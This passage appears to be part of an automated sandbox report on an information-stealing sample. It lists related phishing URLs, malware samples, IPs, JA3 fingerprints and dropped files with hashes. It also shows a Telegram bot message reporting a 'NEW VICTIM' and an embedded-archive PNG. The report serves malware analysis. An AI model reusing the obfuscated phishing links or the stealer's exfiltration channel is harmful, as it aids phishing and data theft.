                                                                                                                                                      https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                        Message_2712729.emlGet hashmaliciousunknownBrowse
                                                                                                                                                          https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              34.117.59.81file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              Code%20Send%20meta%20Discord%20EXE.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              idl57nk7gk.exeGet hashmaliciousNeshtaBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              FormulariomillasbonusLATAM_GsqrekXCVBmUf.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              172.104.150.66.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                              • ipinfo.io/json
                                                                                                                                                              licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                                                                              • ipinfo.io/ip

                                                                                                                                                              Domains

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              ipinfo.iofile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              http://enteolcl.top/Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              Product Blueprint..htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              dYUteuvmHn.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              https://drive.google.com/file/d/1yoYdaJg2olHzjqEKXjn6nnXKPPak7HoL/view?usp=sharing_eil&ts=675747b9Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              zW72x5d91l.batGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              https://copilotse.blob.core.windows.net/$web/hgyxxxtrdfr76tfgfs821yhgh.html?sp=r&st=2024-12-08T12:55:44Z&se=2024-12-31T20:55:44Z&spr=https&sv=2022-11-02&sr=b&sig=7dYMitXSX9zEmg0mEsN7rfqS0sBAZEqtrbG4v8YyfsM%3D#robert.webber@phillyshipyard.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              eEiHdLSfum.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              api.telegram.orgfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Message_2712729.emlGet hashmaliciousunknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23XNick.Atkin@Yorkshirehousing.co.ukGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              Bank Swift and SOA PVRN0072700314080353_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220

                                                                                                                                                              ASNs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              TELEGRAMRUfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • 149.154.167.99
                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • 149.154.167.99
                                                                                                                                                              TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              fWAr4zGUkY.exeGet hashmaliciousRemcos, Amadey, StealcBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                              • 149.154.167.99
                                                                                                                                                              Shipping Documents.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              T#U00fcbitak SAGE RfqF#U0334D#U0334P#U0334..exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              https://@%EF%BD%88%EF%BD%94%EF%BD%94%EF%BD%90%EF%BD%93%EF%BC%9A%E2%93%97%E2%93%A3%E2%93%A3%E2%93%9F%E2%93%A2:@%74%72%61%6E%73%6C%61%74%65.google.al/%74%72%61%6E%73%6C%61%74%65?sl=auto&tl=en&hl=en-US&u=https://google.com/amp/%F0%9F%84%B8%F0%9F%84%BF%F0%9F%84%B5%F0%9F%85%82.%E2%93%98%E2%93%9E/%69%70%66%73/%62%61%66%79%62%65%69%64%66%32%67%68%76%35%76%61%6B%65%71%6C%63%71%71%76%7A%66%73%65%74%74%37%75%7A%73%65%71%6D%6D%75%74%6E%75%61%65%73%74%6F%7A%71%69%6F%75%65%66%32%72%71%32%79%23Xamy.lynt@busey.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              file.exeGet hashmaliciousInvicta Stealer, XWormBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              Josho.mips.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.119.80.120
                                                                                                                                                              http://enteolcl.top/Get hashmaliciousUnknownBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              Product Blueprint..htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              k5NcGFI29j.exeGet hashmaliciousJigsawBrowse
                                                                                                                                                              • 34.117.188.166
                                                                                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                              • 34.117.188.166
                                                                                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                              • 34.117.188.166
                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                              • 34.117.188.166

                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              • 172.217.17.65
                                                                                                                                                              • 216.58.208.238
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              • 172.217.17.65
                                                                                                                                                              • 216.58.208.238
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              • 172.217.17.65
                                                                                                                                                              • 216.58.208.238
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              yiDQb6GkBq.exeGet hashmaliciousAmadey, LummaC Stealer, VidarBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              • 172.217.17.65
                                                                                                                                                              • 216.58.208.238
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              jN6irWtNiG.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              • 172.217.17.65
                                                                                                                                                              • 216.58.208.238
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              yOmgCWM83b.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              • 172.217.17.65
                                                                                                                                                              • 216.58.208.238
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              copia111224mp.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              • 172.217.17.65
                                                                                                                                                              • 216.58.208.238
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              Agreement for Cooperation.PDF.lnk.download.lnkGet hashmaliciousRedLineBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              • 172.217.17.65
                                                                                                                                                              • 216.58.208.238
                                                                                                                                                              • 34.117.59.81
                                                                                                                                                              Agreement for YouTube cooperation.pdf.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                              • 149.154.167.220
                                                                                                                                                              • 172.217.17.65
                                                                                                                                                              • 216.58.208.238
                                                                                                                                                              • 34.117.59.81

                                                                                                                                                              Dropped Files

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              C:\Program Files\Windows Media Player\graph\graph.exefile.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse

                                                                                                                                                                Created / dropped Files

                                                                                                                                                                C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):156917
                                                                                                                                                                Entropy (8bit):7.994509354006501
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, Author: ditekSHen
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

                                                                                                                                                                C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):123394
                                                                                                                                                                Entropy (8bit):7.993523589542907
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:1536:NoxiTioXtBWFfsYExW94I9tiiGCidzWdZNF9p3Ymn9Zqmi943C42nYEmL9yqhTjV:yxFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre
                                                                                                                                                                MD5:53E54AC43786C11E0DDE9DB8F4EB27AB
                                                                                                                                                                SHA1:9C5768D5EE037E90DA77F174EF9401970060520E
                                                                                                                                                                SHA-256:2F606D24809902AF1BB9CB59C16A2C82960D95BFF923EA26F6A42076772F1DB8
                                                                                                                                                                SHA-512:CD1F6D5F4D8CD19226151B6674124AB1E10950AF5A049E8C082531867D71BFAE9D7BC65641171FD55D203E4FBA9756C80D11906D85A30B35EE4E8991ADB21950
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview:PK........DwiY(..wj...........graph.exe..{|...8......f....D]5..HP..d..... Q@b.1.[$.\..&.p.....j.-.V..6...=P!.U@...K...*.>.sf7..b...._/...3....<....oY/..A...................u....].l.(...UyWuv....\x....w.......0|_.].e........*==.m.qq....v....g...~o.........~.V?@.s.......z.......#|.o..........~.].X...%.A......>..xZ.p.0.:.2a.U..PZ...E.^.`>......+d.9..s.x..O.....+............K.2...3...9.M......k3;j.[o.*mg..U.%!...A+.....3O6T{...o....j.:.4.]m...q.{..&...?.A....Q[.|..x.K.X....U.|..V/,......6...|w.s..@0BX...O.I..._..R..@~T.2.t..IK?..M.E.|^............B._C.....-..y;....V.......,|f.wl......:...T./4TbV.\.+..H.....2%.sZ..D.#..}.o..x..w... ..p.!..,..o ...S.]......].}.......c.w..2...<s........!.2'....m.v.><...Ox...O.(C.....@....T.o.Uwm......(ve<...x.f3..\...D..X._.G.7.3.l;..>tQ...5.e..D...lO.i{./..;.JgK........ ...tJ. I.....>..8..Pa...=.Il.S..?.)..@}...:..Cmh.;.v...T.{K..9.)Pqg.%..5.....6..<w..........`-..+h..oA...2.K.......{.."..Wu.;I..w.^o...

                                                                                                                                                                C:\Program Files\Windows Media Player\graph\graph.exe

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):251392
                                                                                                                                                                Entropy (8bit):6.173345887744036
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:TxwndeWCdXSpfDYlUgEP86yZ7JUlfQEc:Tx1dXYYlLEP8l7J8
                                                                                                                                                                MD5:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                SHA1:7BD1D979DE4A86CB0D8C2AD9E1945BD351339AD0
                                                                                                                                                                SHA-256:D6E7CEB5B05634EFBD06C3E28233E92F1BD362A36473688FBAF952504B76D394
                                                                                                                                                                SHA-512:C3164B2F09DC914066201562BE6483F61D3C368675AC5D3466C2D5B754813B8B23FD09AF86B1F15AB8CC91BE8A52B3488323E7A65198E5B104F9C635EC5ED5CC
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%.1!am_ram_ram_r*.\sdm_r*.Zs.m_rq.\skm_rq.[sqm_r*.[spm_rq.Zs8m_r*.^shm_ram^r.m_r*.Vs`m_r*.r`m_r*.]s`m_rRicham_r........PE..d...../g.........."....).|...n.................@............................. ............`.....................................................d...............`'...................A..p...........................`@..@...............h............................text....z.......|.................. ..`.rdata..............................@..@.data...$-..........................@....pdata..`'.......(..................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sendMessage[1].json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):776
                                                                                                                                                                Entropy (8bit):5.108291155461825
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:YKOHmy1JVBa4YGQVPe071kWyPyoZEB6BasJENBm9c:YVHmQTBj/Q51WPtZ7ujMc
                                                                                                                                                                MD5:4CFB7E0E1DCD6F13DAD24D92EF124D76
                                                                                                                                                                SHA1:00009BCAE4BD213E72811B7E53968423596EF90D
                                                                                                                                                                SHA-256:292EB11391FD6EDFFBFF01DF1DFE62E88E4D618B6EB07D0D4A8D8BE3D185458C
                                                                                                                                                                SHA-512:8F1DB69DB67EBDCDBB2B1DC3997496F679C14D3BA7FDEFC158CB7A19665B28F509A79BA997D2982E49A759133B7BB994B863E842D385B3C89B7074EAC5AE25F4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"ok":true,"result":{"message_id":3331,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734019283,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 648351\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):321
                                                                                                                                                                Entropy (8bit):4.99323851364312
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
                                                                                                                                                                MD5:7225D8C283F7B303692A163301880199
                                                                                                                                                                SHA1:7BF7F829E108693DB3DAD66B557EAA1DBA464D94
                                                                                                                                                                SHA-256:19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
                                                                                                                                                                SHA-512:05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\output[1].png

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):156917
                                                                                                                                                                Entropy (8bit):7.994509354006501
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Yara Hits:
                                                                                                                                                                • Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\output[1].png, Author: ditekSHen
                                                                                                                                                                Preview:.PNG........IHDR................p....IDATx....|.e....3......D dw6...S..Y.[......#*L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.*....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

                                                                                                                                                                C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\json[1].json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):321
                                                                                                                                                                Entropy (8bit):4.99323851364312
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:kX32J19HgIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kWJ1JgIOuHhA/XvoPPWV5k
                                                                                                                                                                MD5:7225D8C283F7B303692A163301880199
                                                                                                                                                                SHA1:7BF7F829E108693DB3DAD66B557EAA1DBA464D94
                                                                                                                                                                SHA-256:19B824BE603626AAD3EB7CAAA5F56F709F22AE80965559A81977DEC9CB22A944
                                                                                                                                                                SHA-512:05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

                                                                                                                                                                C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                File Type:PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):156917
                                                                                                                                                                Entropy (8bit):7.994509354006501
                                                                                                                                                                Encrypted:true
                                                                                                                                                                SSDEEP:3072:T0ogum1PKnCjOE92xFfR4Iti+Zv95YU9Zq3mLTp1lD+tFre:T0oRCa6Gz4U9+6Q3O+Fre
                                                                                                                                                                MD5:F89267B24ECF471C16ADD613CEC34473
                                                                                                                                                                SHA1:C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
                                                                                                                                                                SHA-256:21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
                                                                                                                                                                SHA-512:C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Yara Hits:
